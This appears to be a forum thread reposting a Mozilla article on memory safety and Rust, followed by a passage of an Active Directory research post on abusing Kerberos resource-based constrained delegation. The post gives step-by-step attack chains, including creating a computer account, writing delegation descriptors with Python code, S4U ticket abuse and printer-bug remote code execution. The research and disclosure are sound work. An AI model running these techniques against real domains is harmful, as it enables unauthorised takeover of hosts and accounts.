
  1. Fearless Security: Memory Safety

By Diane Hosfelt. Posted on January 23, 2019 in Featured Article, Rust, and Security.

Last year, Mozilla shipped Quantum CSS in Firefox, which was the culmination of 8 years of investment in Rust, a memory-safe systems programming language, and over a year of rewriting a major browser component in Rust. Until now, all major browser engines have been written in C++, mostly for performance reasons. However, with great performance comes great (memory) responsibility: C++ programmers have to manually manage memory, which opens a Pandora’s box of vulnerabilities. Rust not only prevents these kinds of errors, but the techniques it uses to do so also prevent data races, allowing programmers to reason more effectively about parallel code.

In the coming weeks, this three-part series will examine memory safety and thread safety, and close with a case study of the potential security benefits gained from rewriting Firefox’s CSS engine in Rust.

What Is Memory Safety?

When we talk about building secure applications, we often focus on memory safety. Informally, this means that in all possible executions of a program, there is no access to invalid memory. Violations include:

- use after free
- null pointer dereference
- using uninitialized memory
- double free
- buffer overflow

For a more formal definition, see Michael Hicks’ What is memory safety post and The Meaning of Memory Safety, a paper that formalizes memory safety.

Memory violations like these can cause programs to crash unexpectedly and can be exploited to alter intended behavior. Potential consequences of a memory-related bug include information leakage, arbitrary code execution, and remote code execution.

Managing Memory

Memory management is crucial to both the performance and the security of applications. This section will discuss the basic memory model.

One key concept is pointers. A pointer is a variable that stores a memory address. If we visit that memory address, there will be some data there, so we say that the pointer is a reference to (or points to) that data. Just like a home address shows people where to find you, a memory address shows a program where to find data. Everything in a program is located at a particular memory address, including code instructions. Pointer misuse can cause serious security vulnerabilities, including information leakage and arbitrary code execution.

Allocation/free

When we create a variable, the program needs to allocate enough space in memory to store the data for that variable. Since the memory owned by each process is finite, we also need some way of reclaiming resources (or freeing them). When memory is freed, it becomes available to store new data, but the old data can still exist until it is overwritten.

Buffers

A buffer is a contiguous area of memory that stores multiple instances of the same data type. For example, the phrase “My cat is Batman” would be stored in a 16-byte buffer. Buffers are defined by a starting memory address and a length; because the data stored in memory next to a buffer could be unrelated, it’s important to ensure we don’t read or write past the buffer boundaries.

Control Flow

Programs are composed of subroutines, which are executed in a particular order. At the end of a subroutine, the computer jumps to a stored pointer (called the return address) to the next part of code that should be executed.
When we jump to the return address, one of three things happens:

1. The process continues as expected (the return address was not corrupted).
2. The process crashes (the return address was altered to point at non-executable memory).
3. The process continues, but not as expected (the return address was altered and control flow changed).

How languages achieve memory safety

We often think of programming languages on a spectrum. On one end, languages like C/C++ are efficient, but require manual memory management; on the other, interpreted languages use automatic memory management (like reference counting or garbage collection [GC]), but pay the price in performance. Even languages with highly optimized garbage collectors can’t match the performance of non-GC’d languages.

Manually

Some languages (like C) require programmers to manually manage memory by specifying when to allocate resources, how much to allocate, and when to free the resources. This gives the programmer very fine-grained control over how their implementation uses resources, enabling fast and efficient code. However, this approach is prone to mistakes, particularly in complex codebases. Mistakes that are easy to make include:

- forgetting that resources have been freed and trying to use them
- not allocating enough space to store data
- reading past the boundary of a buffer

A safety video candidate for manual memory management

Smart pointers

A smart pointer is a pointer with additional information to help prevent memory mismanagement. These can be used for automated memory management and bounds checking. Unlike raw pointers, a smart pointer is able to self-destruct, instead of waiting for the programmer to manually destroy it. There’s no single smart pointer type—a smart pointer is any type that wraps a raw pointer in some practical abstraction.

Some smart pointers use reference counting to count how many variables are using the data owned by a variable, while others implement a scoping policy to constrain a pointer lifetime to a particular scope. In reference counting, the object’s resources are reclaimed when the last reference to the object is destroyed. Basic reference counting implementations can suffer from performance and space overhead, and can be difficult to use in multi-threaded environments. Situations where objects refer to each other (cyclical references) can prevent either object’s reference count from ever reaching zero, which requires more sophisticated methods.

Garbage Collection

Some languages (like Java, Go, Python) are garbage collected. A part of the runtime environment, named the garbage collector (GC), traces variables to determine what resources are reachable in a graph that represents references between objects. Once an object is no longer reachable, its resources are not needed and the GC reclaims the underlying memory to reuse in the future. All allocations and deallocations occur without explicit programmer instruction. While a GC ensures that memory is always used validly, it doesn’t reclaim memory in the most efficient way. The last time an object is used could occur much earlier than when it is freed by the GC. Garbage collection has a performance overhead that can be prohibitive for performance-critical applications; it can require up to 5x as much memory to avoid a runtime performance penalty.
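Both of these automatic strategies are easy to observe side by side in Python, whose CPython runtime uses reference counting as its primary mechanism and a tracing collector for the cyclic garbage that reference counts alone cannot reclaim. A minimal, standard-library-only sketch:

```python
import gc
import sys

class Node:
    def __init__(self):
        self.other = None

a = Node()
print(sys.getrefcount(a))  # 2: 'a' itself plus the temporary argument reference

b = a                      # another reference to the same object
print(sys.getrefcount(a))  # 3

# A reference cycle: each object keeps the other's count above zero forever.
x, y = Node(), Node()
x.other, y.other = y, x
del x, y

# Pure reference counting would leak the pair; CPython's tracing cycle
# collector finds and reclaims them.
print(gc.collect())        # number of unreachable objects collected (> 0)
```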
Ownership

To achieve both performance and memory safety, Rust uses a concept called ownership. More formally, the ownership model is an example of an affine type system. All Rust code follows certain ownership rules that allow the compiler to manage memory without incurring runtime costs:

1. Each value has a variable, called the owner.
2. There can only be one owner at a time.
3. When the owner goes out of scope, the value will be dropped.

Values can be moved or borrowed between variables. These rules are enforced by a part of the compiler called the borrow checker.

When a variable goes out of scope, Rust frees that memory. In the following example, when s1 and s2 go out of scope, they would both try to free the same memory, resulting in a double free error. To prevent this, when a value is moved out of a variable, the previous owner becomes invalid. If the programmer then attempts to use the invalid variable, the compiler will reject the code. This can be avoided by creating a deep copy of the data or by using references.

Example 1: Moving ownership

    let s1 = String::from("hello");
    let s2 = s1;
    println!("{}, world!", s1); // won't compile because s1 is now invalid

Another set of rules verified by the borrow checker pertains to variable lifetimes. Rust prohibits the use of uninitialized variables and dangling pointers, which can cause a program to reference unintended data. If the code in the example below compiled, r would reference memory that is deallocated when x goes out of scope—a dangling pointer. The compiler tracks scopes to ensure that all borrows are valid, occasionally requiring the programmer to explicitly annotate variable lifetimes.

Example 2: A dangling pointer

    let r;
    {
        let x = 5;
        r = &x;
    }
    println!("r: {}", r);

The ownership model provides a strong foundation for ensuring that memory is accessed appropriately, preventing undefined behavior.

Memory Vulnerabilities

The main consequences of memory vulnerabilities include:

- Crash: accessing invalid memory can make applications terminate unexpectedly.
- Information leakage: inadvertently exposing non-public data, including sensitive information like passwords.
- Arbitrary code execution (ACE): allows an attacker to execute arbitrary commands on a target machine; when this is possible over a network, we call it remote code execution (RCE).

Another type of problem that can appear is memory leakage, which occurs when memory is allocated but not released after the program is finished using it. It’s possible to use up all available memory this way. Without any remaining memory, legitimate resource requests will be blocked, causing a denial of service. This is a memory-related problem, but one that can’t be addressed by programming languages.

The best case scenario with most memory errors is that an application will crash harmlessly—this isn’t a good best case. However, the worst case scenario is that an attacker can gain control of the program through the vulnerability (which could lead to further attacks).

Misusing Free (use-after-free, double free)

This subclass of vulnerabilities occurs when some resource has been freed, but its memory position is still referenced. It’s a powerful exploitation method that can lead to out-of-bounds access, information leakage, code execution and more. Garbage-collected and reference-counted languages prevent the use of invalid pointers by only destroying unreachable objects (which can have a performance penalty), while manually managed languages are particularly susceptible to invalid pointer use (particularly in complex codebases).
Rust’s borrow checker doesn’t allow object destruction as long as references to the object exist, which means bugs like these are prevented at compile time.

Uninitialized variables

If a variable is used prior to initialization, the data it contains could be anything—including random garbage or previously discarded data—resulting in information leakage (these are sometimes called wild pointers). Often, memory-managed languages use a default initialization routine that is run after allocation to prevent these problems.

Like C, most variables in Rust are uninitialized until assignment—unlike C, you can’t read them prior to initialization. The following code will fail to compile:

Example 3: Using an uninitialized variable

    fn main() {
        let x: i32;
        println!("{}", x);
    }

Null pointers

When an application dereferences a pointer that turns out to be null, usually this means that it simply accesses garbage that will cause a crash. In some cases, these vulnerabilities can lead to arbitrary code execution. Rust has two types of pointers, references and raw pointers. References are safe to access, while raw pointers could be problematic.

Rust prevents null pointer dereferencing in two ways:

- avoiding nullable pointers
- avoiding raw pointer dereferencing

Rust avoids nullable pointers by replacing them with a special Option type. In order to manipulate the possibly-null value inside of an Option, the language requires the programmer to explicitly handle the null case or the program will not compile.

When we can’t avoid nullable pointers (for example, when interacting with non-Rust code), what can we do? Try to isolate the damage. Any dereferencing of raw pointers must occur in an unsafe block. This keyword relaxes Rust’s guarantees to allow some operations that could cause undefined behavior (like dereferencing a raw pointer).

Buffer overflow

While the other vulnerabilities discussed here are prevented by methods that restrict access to undefined memory, a buffer overflow inappropriately accesses legally allocated memory. Like a use-after-free bug, an out-of-bounds access can also be problematic because it may reach memory that has been freed but not yet reallocated, and hence still contains sensitive information that’s supposed to no longer exist.

A buffer overflow simply means an out-of-bounds access. Due to how buffers are stored in memory, they often lead to information leakage, which could include sensitive data such as passwords. More severe instances can allow ACE/RCE vulnerabilities by overwriting the instruction pointer.

Example 4: Buffer overflow (C code)

    #include <stdio.h>

    int main() {
        int buf[] = {0, 1, 2, 3, 4};
        // print out of bounds
        printf("Out of bounds: %d\n", buf[10]);
        // write out of bounds
        buf[10] = 10;
        printf("Out of bounds: %d\n", buf[10]);
        return 0;
    }

The simplest defense against a buffer overflow is to always require a bounds check when accessing elements, but this adds a runtime performance penalty. How does Rust handle this? The built-in buffer types in Rust’s standard library require a bounds check for any random access, but also provide iterator APIs that can reduce the impact of these bounds checks over multiple sequential accesses. These choices ensure that out-of-bounds reads and writes are impossible for these types. Rust promotes patterns that lead to bounds checks only occurring in those places where a programmer would almost certainly have to manually place them in C/C++.
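For contrast with the C program above, here is the same pair of accesses in a bounds-checked runtime (a minimal illustration in Python, not from the original article). Instead of silently reading or corrupting whatever sits next to the buffer, every out-of-bounds access is refused at runtime; Rust behaves analogously, panicking on buf[10] or returning None from buf.get(10).

```python
buf = [0, 1, 2, 3, 4]

try:
    print(buf[10])    # the read is bounds-checked at runtime
except IndexError as e:
    print("out-of-bounds read refused:", e)

try:
    buf[10] = 10      # the write is bounds-checked as well
except IndexError as e:
    print("out-of-bounds write refused:", e)
```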
Memory safety is only half the battle

Memory safety violations open programs to security vulnerabilities like unintentional data leakage and remote code execution. There are various ways to ensure memory safety, including smart pointers and garbage collection. You can even formally prove memory safety. While some languages have accepted slower performance as a tradeoff for memory safety, Rust’s ownership system achieves memory safety while minimizing the performance costs.

Unfortunately, memory errors are only part of the story when we talk about writing secure code. The next post in this series will discuss concurrency attacks and thread safety.

Exploiting Memory: In-depth resources

- Heap memory and exploitation
- Smashing the stack for fun and profit
- Analogies of Information Security
- Intro to use after free vulnerabilities

About Diane Hosfelt (@avadacatavra)

Sursa: https://hacks.mozilla.org/2019/01/fearless-security-memory-safety/
  2. Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory

28 January 2019 • Elad Shamir • 41 min read

Back in March 2018, I embarked on an arguably pointless crusade to prove that the TrustedToAuthForDelegation attribute was meaningless, and that “protocol transition” can be achieved without it. I believed that, security-wise, once constrained delegation was enabled (msDS-AllowedToDelegateTo was not null), it did not matter whether it was configured to use “Kerberos only” or “any authentication protocol”.

I started the journey with Benjamin Delpy’s (@gentilkiwi) help modifying Kekeo to support a certain attack that involved invoking S4U2Proxy with a silver ticket without a PAC, and we had partial success, but the final TGS turned out to be unusable. Ever since then, I kept coming back to it, trying to solve the problem with different approaches but did not have much success. Until I finally accepted defeat, and ironically then the solution came up, along with several other interesting abuse cases and new attack techniques.

TL;DR

This post is lengthy, and I am conscious that many of you do not have the time or attention span to read it, so I will try to convey the important points first:

- Resource-based constrained delegation does not require a forwardable TGS when invoking S4U2Proxy.
- S4U2Self works on any account that has an SPN, regardless of the state of the TrustedToAuthForDelegation attribute.
- If TrustedToAuthForDelegation is set, then the TGS that S4U2Self produces is forwardable, unless the principal is sensitive for delegation or a member of the Protected Users group.
- The above points mean that if an attacker can control a computer object in Active Directory, then it may be possible to abuse it to compromise the host.
- S4U2Proxy always produces a forwardable TGS, even if the provided additional TGS in the request was not forwardable.
- The above point means that if an attacker compromises any account with an SPN as well as an account with classic constrained delegation, then it does not matter whether the TrustedToAuthForDelegation attribute is set.
- By default, any domain user can abuse the MachineAccountQuota to create a computer account and set an SPN for it, which makes it even more trivial to abuse resource-based constrained delegation to mimic protocol transition (obtain a forwardable TGS for arbitrary users to a compromised service).
- S4U2Self allows generating a valid TGS for arbitrary users, including those marked as sensitive for delegation or members of the Protected Users group. The resulting TGS has a PAC with a valid KDC signature. All that’s required is the computer account credentials or a TGT.
- The above point in conjunction with unconstrained delegation and “the printer bug” can lead to remote code execution (RCE).
- Resource-based constrained delegation on the krbtgt account allows producing TGTs for arbitrary users, and can be abused as a persistence technique.
- Configuring resource-based constrained delegation through NTLM relay from HTTP to LDAP may facilitate remote code execution (RCE) or local privilege escalation (LPE) on MSSQL servers, and local privilege escalation (LPE) on Windows 10/2016/2019.
- Computer accounts just got a lot more interesting. Start hunting for more primitives to trigger attack chains!

Kerberos Delegation 101

If you are not up to speed with abusing Kerberos delegation, you should first read the post S4U2Pwnage by Will Schroeder (@harmj0y) and Lee Christensen (@tifkin_).
In that post, they explained it better than I ever could, but I will try to capture it very concisely as well. First, a simplified overview of Kerberos:

1. When users log in, they encrypt a piece of information (a timestamp) with an encryption key derived from their password, to prove to the authentication server that they know the password. This step is called “preauthentication”. In Active Directory environments, the authentication server is a domain controller.
2. Upon successful preauthentication, the authentication server provides the user with a ticket-granting-ticket (TGT), which is valid for a limited time.
3. When a user wishes to authenticate to a certain service, the user presents the TGT to the authentication server. If the TGT is valid, the user receives a ticket-granting service (TGS), also known as a “service ticket”, from the authentication server.
4. The user can then present the TGS to the service they want to access, and the service can authenticate the user and make authorisation decisions based on the data contained in the TGS.

A few important notes about Kerberos tickets:

- Every ticket has a clear-text part and an encrypted part.
- The clear-text part of the ticket contains the Service Principal Name (SPN) of the service for which the ticket is intended.
- The encryption key used for the encrypted part of the ticket is derived from the password of the account of the target service.
- TGTs are encrypted for the built-in account “krbtgt”. The SPN on TGTs is krbtgt/domain name.

Often, there is a requirement for a service to impersonate the user to access another service. To facilitate that, the following delegation features were introduced to the Kerberos protocol:

- Unconstrained Delegation (TrustedForDelegation): The user sends a TGS to access the service, along with their TGT, and then the service can use the user’s TGT to request a TGS for the user to any other service and impersonate the user.
- Constrained Delegation (S4U2Proxy): The user sends a TGS to access the service (“Service A”), and if the service is allowed to delegate to another pre-defined service (“Service B”), then Service A can present to the authentication service the TGS that the user provided and obtain a TGS for the user to Service B. Note that the TGS provided in the S4U2Proxy request must have the FORWARDABLE flag set. The FORWARDABLE flag is never set for accounts that are configured as “sensitive for delegation” (the USER_NOT_DELEGATED attribute is set to true) or for members of the Protected Users group.
- Protocol Transition (S4U2Self/TrustedToAuthForDelegation): S4U2Proxy requires the service to present a TGS for the user to itself before the authentication service produces a TGS for the user to another service. It is often referred to as the “additional ticket”, but I like referring to it as “evidence” that the user has indeed authenticated to the service invoking S4U2Proxy. However, sometimes users authenticate to services via other protocols, such as NTLM or even form-based authentication, and so they do not send a TGS to the service. In such cases, a service can invoke S4U2Self to ask the authentication service to produce a TGS for arbitrary users to itself, which can then be used as “evidence” when invoking S4U2Proxy. This feature allows impersonating users out of thin air, and it is only possible when the TrustedToAuthForDelegation flag is set for the service account that invokes S4U2Self.
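As a practical aside, all of the delegation flavours discussed in this post live in a handful of directory attributes and userAccountControl bits, so they are easy to inventory over LDAP. A minimal sketch, assuming the ldap3 package and hypothetical host and credential names:

```python
from ldap3 import Server, Connection, NTLM, SUBTREE

server = Server("dc01.contoso.local")
conn = Connection(server, user="CONTOSO\\someuser", password="Passw0rd!",
                  authentication=NTLM, auto_bind=True)

base = "DC=contoso,DC=local"
# 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule;
# 0x80000 = TRUSTED_FOR_DELEGATION, 0x1000000 = TRUSTED_TO_AUTH_FOR_DELEGATION.
filters = {
    "unconstrained":             "(userAccountControl:1.2.840.113556.1.4.803:=524288)",
    "protocol transition":       "(userAccountControl:1.2.840.113556.1.4.803:=16777216)",
    "classic constrained":       "(msDS-AllowedToDelegateTo=*)",
    "resource-based (incoming)": "(msDS-AllowedToActOnBehalfOfOtherIdentity=*)",
}
for kind, ldap_filter in filters.items():
    conn.search(base, ldap_filter, SUBTREE,
                attributes=["sAMAccountName", "msDS-AllowedToDelegateTo"])
    print(kind, [str(e.sAMAccountName) for e in conn.entries])
```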
The Other Constrained Delegation

Back in October 2018, I collaborated with Will Schroeder (@harmj0y) to abuse resource-based constrained delegation as an ACL-based computer object takeover primitive. Will wrote an excellent post on this topic, which you should also read before continuing. Once again, in that post, Will explained it better than I ever could, but I will try to capture it very concisely here.

In order to configure constrained delegation, one has to have the SeEnableDelegation privilege, which is sensitive and typically only granted to Domain Admins. In order to give users/resources more independence, resource-based constrained delegation was introduced in Windows Server 2012. Resource-based constrained delegation allows resources to configure which accounts are trusted to delegate to them. This flavour of constrained delegation is very similar to the classic constrained delegation but works in the opposite direction. Classic constrained delegation from account A to account B is configured on account A in the msDS-AllowedToDelegateTo attribute, and defines an “outgoing” trust from A to B, while resource-based constrained delegation is configured on account B in the msDS-AllowedToActOnBehalfOfOtherIdentity attribute, and defines an “incoming” trust from A to B.

An important observation is that every resource can configure resource-based constrained delegation for itself. In my mind, it does make sense to allow resources to decide for themselves whom they trust.
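Concretely, msDS-AllowedToActOnBehalfOfOtherIdentity holds a binary security descriptor whose DACL lists the accounts trusted to delegate to the resource. The following sketch shows one way to write it, modeled on later public tooling rather than on anything in this post; it assumes impacket and ldap3 (reusing the connection from the earlier sketch), and all names and SIDs are hypothetical:

```python
import ldap3
from impacket.ldap import ldaptypes

def build_rbcd_descriptor(allowed_sid):
    # Security descriptor whose DACL grants the delegating account
    # ("Service A") full control; this is what the KDC checks.
    sd = ldaptypes.SR_SECURITY_DESCRIPTOR()
    sd['Revision'] = b'\x01'
    sd['Sbz1'] = b'\x00'
    sd['Control'] = 32772                          # SE_DACL_PRESENT | SE_SELF_RELATIVE
    sd['OwnerSid'] = ldaptypes.LDAP_SID()
    sd['OwnerSid'].fromCanonical('S-1-5-32-544')   # BUILTIN\Administrators
    sd['GroupSid'] = b''
    sd['Sacl'] = b''

    ace = ldaptypes.ACE()
    ace['AceType'] = ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE
    ace['AceFlags'] = 0x00
    ace_data = ldaptypes.ACCESS_ALLOWED_ACE()
    ace_data['Mask'] = ldaptypes.ACCESS_MASK()
    ace_data['Mask']['Mask'] = 983551              # full control
    ace_data['Sid'] = ldaptypes.LDAP_SID()
    ace_data['Sid'].fromCanonical(allowed_sid)
    ace['Ace'] = ace_data

    dacl = ldaptypes.ACL()
    dacl['AclRevision'] = 4
    dacl['Sbz1'] = 0
    dacl['Sbz2'] = 0
    dacl['Data'] = [ace]
    sd['Dacl'] = dacl
    return sd.getData()

# Write the descriptor onto Service B (requires write access to the object):
value = build_rbcd_descriptor('S-1-5-21-1004336348-1177238915-682003330-1105')
conn.modify('CN=SERVICEB,CN=Computers,DC=contoso,DC=local',
            {'msDS-AllowedToActOnBehalfOfOtherIdentity': [(ldap3.MODIFY_REPLACE, [value])]})
```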
Will and I came up with the following abuse case to compromise a specific host:

1. The attacker compromises an account that has the TrustedToAuthForDelegation flag set (“Service A”).
2. The attacker additionally compromises an account with the rights to configure resource-based constrained delegation for the computer account of the target host (“Service B”).
3. The attacker configures resource-based constrained delegation from Service A to Service B.
4. The attacker invokes S4U2Self and S4U2Proxy as Service A to obtain a TGS for a privileged user to Service B to compromise the target host.

The following diagram illustrates this abuse case:

It is a nice trick, but compromising an account with the TrustedToAuthForDelegation flag set is not trivial. If only my crusade to defeat TrustedToAuthForDelegation had been more fruitful, it would come in handy for this abuse case.

A Selfless Abuse Case: Skipping S4U2Self

In an attempt to make the above ACL-based computer object takeover primitive more generic, I slightly modified Rubeus to allow skipping S4U2Self by letting the attacker supply the “evidence” TGS for the victim when invoking S4U2Proxy. Benjamin Delpy also made this modification to Kekeo back in April 2018; however, at the time of writing, Kekeo does not support resource-based constrained delegation.

The more generic abuse case would work as follows:

1. The attacker compromises Service A and the DACL to configure resource-based constrained delegation on Service B.
2. By way of social engineering or a watering hole attack, the victim authenticates to Service A to access a service (e.g. CIFS or HTTP).
3. The attacker dumps the TGS of the victim to Service A, using Mimikatz sekurlsa::tickets or through another method.
4. The attacker configures resource-based constrained delegation from Service A to Service B.
5. The attacker uses Rubeus to perform S4U2Proxy with the TGS previously obtained as the required “evidence”, from Service A to Service B for the victim.
6. The attacker can pass-the-ticket and impersonate the victim to access Service B.

The following diagram illustrates this scenario:

Video demonstration of this scenario: https://youtu.be/7odfALcmldo

Note that the resulting TGS in the S4U2Proxy response (for the victim to Service B) seems to have the FORWARDABLE flag set, unless the principal is marked as sensitive for delegation or is a member of the Protected Users group.

Serendipity

As I was testing my Rubeus modification in preparation for submitting a pull request, I reset the TrustedToAuthForDelegation UserAccountControl flag on Service A and expected to see an error message when performing S4U2Self. However, S4U2Self worked, as well as S4U2Proxy, and the resulting TGS provided me with access to Service B. The ticket I obtained from S4U2Self was not forwardable, and still, S4U2Proxy accepted it and responded with a TGS for the user to Service B. At this point, I was wondering whether I completely misconfigured my lab environment.

Video demonstration of this scenario: https://youtu.be/IZ6BJpr28r4

A Misunderstood Feature #1

After a couple more hours of testing, debugging, and reading MS-SFU, I realised that I had misunderstood S4U2Self. It seems S4U2Self works whether the TrustedToAuthForDelegation UserAccountControl flag is set or not. However, if it is not set, the resulting TGS is not FORWARDABLE, as per section 3.2.5.1.2 of MS-SFU:

“If the TrustedToAuthenticationForDelegation parameter on the Service 1 principal is set to:
TRUE: the KDC MUST set the FORWARDABLE ticket flag ([RFC4120] section 2.6) in the S4U2self service ticket.
FALSE and ServicesAllowedToSendForwardedTicketsTo is nonempty: the KDC MUST NOT set the FORWARDABLE ticket flag ([RFC4120] section 2.6) in the S4U2self service ticket.”

A Misunderstood Feature #2

So, S4U2Proxy still shouldn’t have worked with a non-forwardable ticket, right? When I attempted invoking S4U2Proxy with a non-forwardable TGS with classic (“outgoing”) constrained delegation, it failed. But with resource-based constrained delegation (“incoming”) it consistently worked. I thought it must be a bug, and so on 26/10/2018, I reported it to the Microsoft Security Response Center (MSRC). As I was impatiently waiting for a response, I read MS-SFU again and found section 3.2.5.2:

“If the service ticket in the additional-tickets field is not set to forwardable<20> and the PA-PAC-OPTIONS [167] ([MS-KILE] section 2.2.10) padata type has the resource-based constrained delegation bit:
Not set, then the KDC MUST return KRB-ERR-BADOPTION with STATUS_NO_MATCH.
Set and the USER_NOT_DELEGATED bit is set in the UserAccountControl field in the KERB_VALIDATION_INFO structure ([MS-PAC] section 2.5), then the KDC MUST return KRB-ERR-BADOPTION with STATUS_NOT_FOUND.”

It seems like a design flaw, also known in Microsoft parlance as a “feature”. S4U2Proxy for resource-based constrained delegation works when provided with a non-forwardable TGS by design! Note that as per the above documentation, even though the TGS doesn’t have to be forwardable for resource-based constrained delegation, if the user is set as “sensitive for delegation”, S4U2Proxy will fail, which is expected.

Generic DACL Abuse

These two misunderstood “features” mean that the only requirement for the ACL-based computer object takeover primitive is the DACL to configure resource-based constrained delegation on the computer object and another account. Any account with an SPN will do. Even just a TGT for the other account will be enough. The reason an SPN is required is that S4U2Self does not seem to work for accounts that do not have one.

But any domain user can obtain an account with an SPN by abusing the MachineAccountQuota, which is set to 10 by default and allows creating new computer accounts. When creating the new computer account, the user can set an SPN for it, or add one later on. Kevin Robertson (@NetSPI) implemented a tool called Powermad that allows doing that through LDAP.
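A rough sketch of what Powermad automates (creating the computer account directly over LDAP) follows; it assumes ldap3 and hypothetical names, and writing unicodePwd requires an encrypted (LDAPS) connection. The add succeeds for an unprivileged user as long as MachineAccountQuota has not been exhausted:

```python
import ldap3

server = ldap3.Server("dc01.contoso.local", use_ssl=True)   # LDAPS for unicodePwd
conn = ldap3.Connection(server, user="CONTOSO\\someuser", password="Passw0rd!",
                        authentication=ldap3.NTLM, auto_bind=True)

name = "EVILPC"
conn.add(
    f"CN={name},CN=Computers,DC=contoso,DC=local",
    ["top", "person", "organizationalPerson", "user", "computer"],
    {
        "sAMAccountName": f"{name}$",
        "dNSHostName": f"{name.lower()}.contoso.local",
        "servicePrincipalName": [f"HOST/{name.lower()}.contoso.local"],
        "userAccountControl": 0x1000,  # WORKSTATION_TRUST_ACCOUNT
        # unicodePwd must be a UTF-16-LE encoded, quoted password.
        "unicodePwd": '"Sup3rSecretPassw0rd!"'.encode("utf-16-le"),
    },
)
print(conn.result)
```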
The generic abuse case would work as follows:

1. The attacker compromises an account that has an SPN or creates one (“Service A”), and the DACL to configure resource-based constrained delegation on a computer account (“Service B”).
2. The attacker configures resource-based constrained delegation from Service A to Service B.
3. The attacker uses Rubeus to perform a full S4U attack (S4U2Self and S4U2Proxy) from Service A to Service B for a user with privileged access to Service B.
4. The attacker can pass-the-ticket and impersonate the user to gain access to Service B.

The following diagram illustrates this scenario:

Video demonstration of this scenario: https://youtu.be/ayavtG7J_TQ

Note that the TGS obtained from S4U2Self in step 3 is not forwardable, and yet it is accepted as “evidence” when invoking S4U2Proxy.

A Forwardable Result

When I inspected the resulting TGS in the S4U2Proxy response, it had the FORWARDABLE flag set. I provided S4U2Proxy with a non-forwardable TGS as “evidence” and got a forwardable TGS. Is this a bug or a feature? I went back to MS-SFU section 3.2.5.2.2, and found the following:

“The KDC MUST reply with the service ticket where:
The sname field contains the name of Service 2.
The realm field contains the realm of Service 2.
The cname field contains the cname from the service ticket in the additional-tickets field.
The crealm field contains the crealm from the service ticket in the additional-tickets field.
The FORWARDABLE ticket flag is set.
The S4U_DELEGATION_INFO structure is in the new PAC.”

It seems like it is another great feature: every TGS produced by S4U2Proxy is always forwardable.

Empowering Active Directory Objects and Reflective Resource-Based Constrained Delegation

When Microsoft introduced resource-based constrained delegation, it transformed users and computers into strong, independent AD objects, which are able to configure this new “incoming” delegation for themselves. By default, all resources have an Access Control Entry (ACE) that permits them to configure resource-based constrained delegation for themselves.

However, if an attacker has credentials for the account, they can forge a silver ticket and gain access to it anyway. The problem with silver tickets is that, when forged, they do not have a PAC with a valid KDC signature. If the target host is configured to validate the KDC PAC signature, the silver ticket will not work. There may also be other security solutions that can detect silver ticket usage. However, if we have credentials for a computer account or even just a TGT, we can configure resource-based constrained delegation from that account to itself, and then use S4U2Self and S4U2Proxy to obtain a TGS for an arbitrary user.

The abuse case would work as follows:

1. The attacker compromises credentials or a TGT for a computer account (“Service A”).
2. The attacker configures resource-based constrained delegation from Service A to itself.
3. The attacker uses Rubeus to perform a full S4U attack and obtain a TGS for a user with privileged access to Service A.
4. The attacker can pass-the-ticket and impersonate the user to access Service A.
The following diagram illustrates this scenario:

Video demonstration of this scenario: https://youtu.be/63RoJrDMUFg

This reflective resource-based constrained delegation is, in fact, equivalent to S4U2Self when the account has the TrustedToAuthForDelegation flag set (also known as “protocol transition”), as it allows the account to obtain a forwardable TGS for itself on behalf of users. However, if an account is configured for classic constrained delegation with “Kerberos only” (TrustedToAuthForDelegation is not set and msDS-AllowedToDelegateTo is not null), then the classic conditions take precedence over the resource-based conditions, and so S4U2Self responds with a non-forwardable TGS and S4U2Proxy fails.

Note that this technique will only allow obtaining a TGS for a user as long as it is not set as “sensitive for delegation” and is not a member of the Protected Users group, as you can see in the screenshots below:

Solving a Sensitive Problem

Inspecting the above output closely indicates that S4U2Self works for a user marked as sensitive for delegation and a member of the Protected Users group. Closer inspection of the ticket shows that it does not have a valid service name, and it is not forwardable. But this can easily be changed, because the service name is not in the encrypted part of the ticket. An attacker can use an ASN.1 editor to modify the SPN on the TGS obtained from S4U2Self, and turn it into a valid one. Once that is done, the attacker has a valid TGS. It is not forwardable, but it is fine for authenticating to the service.

Video demonstration of this scenario: https://youtu.be/caXFG_vAr-w

So, if an attacker has credentials or a TGT for a computer account, they can obtain a TGS to that computer for any user, including sensitive/protected users, with a valid KDC signature in the PAC. That means that obtaining a TGT for a computer account is sufficient to compromise the host.

When the Stars Align: Unconstrained Delegation Leads to RCE

As Lee Christensen (@tifkin_) demonstrated in “the printer bug” abuse case study at DerbyCon 8, it is possible to trick the Print Spooler into connecting back over SMB to a specified IP/hostname by invoking the method RpcRemoteFindFirstPrinterChangeNotification (Opnum 62). If an attacker compromises a host with unconstrained delegation, “the printer bug” abuse can result in remote code execution on any domain-joined Windows host with the Print Spooler running.

The abuse case would work as follows:

1. The attacker compromises a host with unconstrained delegation and elevates.
2. The attacker runs the monitor/harvest module of Rubeus.
3. The attacker launches SpoolSample or dementor.py to manipulate the Print Spooler of the target host into delegating its TGT to the compromised unconstrained delegation host.
4. The attacker can use the captured TGT to obtain a TGS to the target host for any user, even sensitive for delegation/protected users.
5. The attacker obtains a TGS to the target host for a user with local administrator rights and compromises it.

The following diagram illustrates this scenario:

Video demonstration of this scenario: https://youtu.be/XqxWHy9e_J8

As Will Schroeder (@harmj0y) explained in his blog post Not A Security Boundary: Breaking Forest Trusts, unconstrained delegation works across forest boundaries, making this attack effective across bidirectional forest trusts.
When Accounts Collude - TrustedToAuthForDelegation Who?

For years, Active Directory security experts have been telling us that if we must configure Kerberos delegation, constrained delegation is the way to go, and that we should use “Kerberos only” rather than “any authentication protocol” (also known as “protocol transition”). But perhaps the choice between “Kerberos only” and “any authentication protocol” does not actually matter.

We now know that we can abuse resource-based constrained delegation to get a forwardable TGS for arbitrary users. It follows that if we have credentials (or a TGT) for an account with an SPN and for an account with classic constrained delegation but without “protocol transition”, we can combine these two “features” to mimic “protocol transition”.

This abuse case would work as follows:

1. The attacker compromises an account that has an SPN or creates one (“Service A”).
2. The attacker compromises an account (“Service B”), which is set for classic constrained delegation to a certain service class at Service C with Kerberos only (TrustedToAuthForDelegation is not set on Service B, and msDS-AllowedToDelegateTo on Service B contains a service on Service C, such as “time/Service C”).
3. The attacker sets resource-based constrained delegation from Service A to Service B (setting msDS-AllowedToActOnBehalfOfOtherIdentity on Service B to contain “Service A”, using Service B credentials or a TGT for Service B).
